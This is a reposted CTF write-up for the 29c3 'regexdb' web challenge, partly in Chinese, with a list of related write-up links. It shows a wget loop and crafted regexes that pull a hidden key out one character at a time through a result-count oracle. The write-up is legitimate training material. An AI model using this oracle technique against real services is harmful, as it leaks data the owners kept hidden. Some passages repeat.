29c3ctf web100 regexdb writeup
2012-12-30 18:28
1056 查看
原文让我发在了blue-lotus队伍的站点里面了:
不过这里也做一个留念吧~~~
First step is to sort all the 18 result by length, use a simple script to help.
wget -q -O - --post-data="input=-$1-" "http://94.45.252.233/" | grep Results
Using the regex :
Then we can got almost all the wrong answers:
Then we know the answer is one of the last 2 key.
(after got the flag,we know that they are both the keys)
Construct the regex expression
Here we need $left+$right equal to 39 and find the unique $query_set,then it’s the answer.
We can simply use escape grammar to do this. It does not support [a-zA-Z] grammar,
so we have to write all the query characters.
Starts from
Binary search here is a better choice.
After all above, we got the answer:
29c3ctf
web100 regexdb writeup
不过这里也做一个留念吧~~~
Problem Link: regexdb
**Description** Ever played Googlewhack? Well, this is a bit [easier][2] and gives you more power, enjoy.
Quote From google shared doc:
题目给的提示是googlewhack,这个的意思就是查询时仅返回一条结果。 首先经过测试,所有的输入要在--之间。 比如:输入 -- 返回结果是 18 . 输入 - . - 返回结果是: results: 1: 29C3_NotAKey
Some useful information:
Query language “analysis” (Jay): - . is single character - * is wildcard - | is OR operator - ^ is BEGINNING OF STRING operator
Examples
** - 18 results (total in db) *29C3* - 12 results *^29C3* - 6 results *.{40}* - 3 results (all results which are 40 chars long) **!!This is a perl regular expression engine!!**
First step is to sort all the 18 result by length, use a simple script to help.
wget -q -O - --post-data="input=-$1-" "http://94.45.252.233/" | grep Results
Using the regex :
^.{$length}$to seperate all the input data.
Then we can got almost all the wrong answers:
29C3_ Key: None Key: 29C3_ 29C3_Wrong Hello World! 29C3_NoBadOne 29C3_____NO_____ Wrong: 29C3_Wrong K3y: 29C3_AlsoBad 29C3_ImSimplyWrong 23 23 23 23 23 23 23 23 This one is unrelated... Key: 29C3_AnotherOneWhichIsWrong 29C3_NotAKey <- this one is not a key 42 42 42 42 42 42 42 42 42 42 42 42 42 42 Key: 29C3_?? length 40 Key: 29C3_?? length 40
Then we know the answer is one of the last 2 key.
(after got the flag,we know that they are both the keys)
Construct the regex expression
^.{$left}[$query_set].{$right}$
Here we need $left+$right equal to 39 and find the unique $query_set,then it’s the answer.
We can simply use escape grammar to do this. It does not support [a-zA-Z] grammar,
so we have to write all the query characters.
Starts from
$query="\1\2...\7f",check the result wether include character ’2′
Binary search here is a better choice.
After all above, we got the answer:
Key: 29C3_Well.This/Is#Not+The|Wrong?Key
相关文章推荐
- 33c3 CTF web WriteUp
- bugkuCTF Writeup (Web)10-14
- bugkuCTF Writeup (Web)41-44
- bugkuCTF Writeup (Web)31-35
- 南邮CTF-WEB-write-up 教程详细解说
- bugkuCTF Writeup (Web)22-25
- 0ctf 部分web writeup.md
- TWCTF 2016 (Tokyo Westerns CTF ) WEB WriteUp
- bugkuCTF Writeup (Web)36-40
- [zctf 2016] reverse 100 write up
- NJCTF WEB Writeup
- ASIS CTF - 三个魔法Web关WriteUp
- 南邮CTF平台writeup:Web(一)
- volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
- bugkuCTF Writeup (Web)26-29
- Nuit du Hack CTF Quals 2018 writeup (web)
- Bugku ctf writeup--web进阶-Bugku-cms1
- CTF-练习平台 writeup web
- NJCTF 2017 web Writeup
- SWPU CTF 2017 Web WriteUp